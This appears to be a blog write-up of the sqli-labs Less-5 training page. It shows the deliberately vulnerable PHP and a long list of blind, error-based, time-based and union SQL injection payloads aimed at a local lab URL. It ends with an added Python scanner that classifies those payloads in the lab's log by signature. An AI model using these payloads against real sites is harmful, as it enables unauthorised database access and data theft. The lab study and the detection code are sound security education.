Less-5
A quick look at the source

```php
<?php
// including the MySQL connection parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if (isset($_GET['id'])) {
    $id = $_GET['id'];

    // logging the connection parameters to a file for analysis.
    $fp = fopen('result.txt', 'a');
    fwrite($fp, 'ID:' . $id . "\n");
    fclose($fp);

    // connectivity
    $sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1"; // the id is wrapped in single quotes
    $result = mysql_query($sql);
    $row = mysql_fetch_array($result);

    // If the statement is valid the page renders normally, otherwise an error is returned.
    // No query data is ever echoed back to the page.
    if ($row) {
        echo '<font size="5" color="#FFFF00">';
        echo 'You are in...........';
        echo "<br>";
        echo "</font>";
    } else {
        echo '<font size="3" color="#FFFF00">';
        print_r(mysql_error());
        echo "</br></font>";
        echo '<font color= "#0000ff" font size= 3>';
    }
} else {
    echo "Please input the ID as parameter with numeric value";
}
?>
```
Inferring values from boolean conditions
Note: everything below narrows each value down by binary search.
Check whether the first digit of the database version is 5 (the version is known to be 5)
http://127.0.0.1/Less-5/index.php?id=1'and left(version(),1)=5--+
// if the condition holds the page renders normally, otherwise it errors
Determine the length of the database name
http://127.0.0.1/Less-5/index.php?id=1'and length(database())=8--+
Check whether the first letter of the database name is greater than 'a'
http://127.0.0.1/Less-5/index.php?id=1' and left(database(),1)>'a'--+
Check the first two letters of the database name
http://127.0.0.1/Less-5/index.php?id=1'and left(database(),2)>'sa'--+
Injecting with substr() and ascii()
ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101
To get the second character, just use substr(string,2,1)
To get the second table, just change limit 0,1 to limit 1,1
Using regexp to enumerate the columns of the users table
http://127.0.0.1/Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and table_name regexp '^us[a-z]' limit 0,1)-- +
Check whether the users table has a column whose name starts with us**
http://127.0.0.1/Less-5/index.php?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1)-- +
Using the ord() and mid() functions
http://127.0.0.1/Less-5/index.php?id=1' and ord(mid((select ifnull(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68
Error-based injection
http://127.0.0.1/Less-5/?id=1'union select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
double value out of range
http://127.0.0.1/Less-5/?id=1'union select (exp(~(select * from (select user())a))),2,3--+
bigint overflow error
http://127.0.0.1/Less-5/?id=1'union select (!(select * from (select user())x) - ~0),2,3--+
xpath function errors
http://127.0.0.1/Less-5/?id=1'and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+
http://127.0.0.1/Less-5/?id=1'and updatexml(1,concat(0x7e,(select @@version),0x7e),1)--+
Exploiting duplicate column names
http://127.0.0.1/Less-5/?id=1'union select 1,2,3 from (select name_const(version(),1),name_const(version(),1))x--+
Time-based injection
http://127.0.0.1/Less-5/?id=1'and if(ascii(substr(database(),1,1))=115,1,sleep(5))--+
When the condition is false the response is delayed by 5 seconds
benchmark() delay
http://127.0.0.1/Less-5/?id=1'union select (if(substring(current,1,1)=char(115),benchmark(50000000,encode('msg','by 5 seconds')),null)),2,3 from (select database() as current) as tb1--+
When the condition is true, running encode('msg','by 5 seconds') 5000000 times takes a noticeable amount of time
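Every one of the payloads above passes through the fwrite() in the source, so the lab's own result.txt is a complete audit trail of the attack. The following is an added example, not part of the walkthrough or of sqli-labs: a small scanner for that "ID:<value>" log format that tags each non-numeric id with the injection family it resembles (time-based via sleep()/benchmark(), error-based via extractvalue()/updatexml()/name_const()/floor(rand())/exp(~), boolean-blind via substr()/ascii()/ord()/mid()/left() comparisons, union select, and information_schema or version()/database()/user() probes). The log excerpt is constructed from the payloads on this page; the signature list and tag names are this example's own.

```python
"""Added example, not from the walkthrough: classify entries in the lab's result.txt.

The PHP writes one line per request as 'ID:' . $id, so the scanner reads that
format. SAMPLE_LOG is a constructed excerpt built from the payloads in this
walkthrough (kept in the raw --+ form they are written in above; a live log
would hold the URL-decoded value, with a space in place of the +).
"""
import re

SAMPLE_LOG = """ID:1
ID:2
ID:1'and left(version(),1)=5--+
ID:1' and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id limit 0,1),1,1))=68
ID:1'and if(ascii(substr(database(),1,1))=115,1,sleep(5))--+
ID:1'and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+
ID:1'union select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
ID:3
"""

# Signature families, in the order their tags are reported. Names are this example's own.
SIGNATURES = [
    ("time-based", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("error-based", re.compile(
        r"\b(?:extractvalue|updatexml|name_const)\s*\(|floor\s*\(\s*rand|exp\s*\(\s*~|-\s*~\s*0\b", re.I)),
    ("boolean-blind", re.compile(
        r"\b(?:left|substr|substring|mid|ascii|ord|length)\s*\(.*?[=<>]|\bregexp\b", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema-probe", re.compile(
        r"information_schema|@@version|\b(?:version|database|user)\s*\(", re.I)),
]
COMMENT_TAIL = re.compile(r"--|#|/\*")


def classify(value):
    """Return the list of tags for one logged id; an empty list means it looks benign.

    The page itself promises a numeric id, so anything non-numeric is already
    worth a look; the signature families refine what kind of probe it was."""
    if value.strip().isdigit():
        return []
    tags = ["non-numeric"]
    tags += [name for name, rx in SIGNATURES if rx.search(value)]
    if "'" in value or COMMENT_TAIL.search(value):
        tags.append("quote-or-comment")  # literal closed and/or rest of the query commented out
    return tags


def scan(log_text):
    """Return (line_no, value, tags) for every suspicious ID line in a result.txt dump."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.startswith("ID:"):
            continue
        value = line[3:]
        tags = classify(value)
        if tags:
            findings.append((n, value, tags))
    return findings


if __name__ == "__main__":
    for n, value, tags in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(tags)}\n    {value}")
```

The same regexes work over a web server access log once the query string is URL-decoded, but the result.txt sink in this lab is the better source because it holds the value exactly as the SQL string received it. A time-based family hit deserves the most attention on a real system: unlike the others it produces no error and an ordinary-looking response, so a latency spike in the access log may be the only other trace.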
Personal blog:
http://pigdaqiang.top
Jianshu:
https://www.jianshu.com/p/3cefb0134f89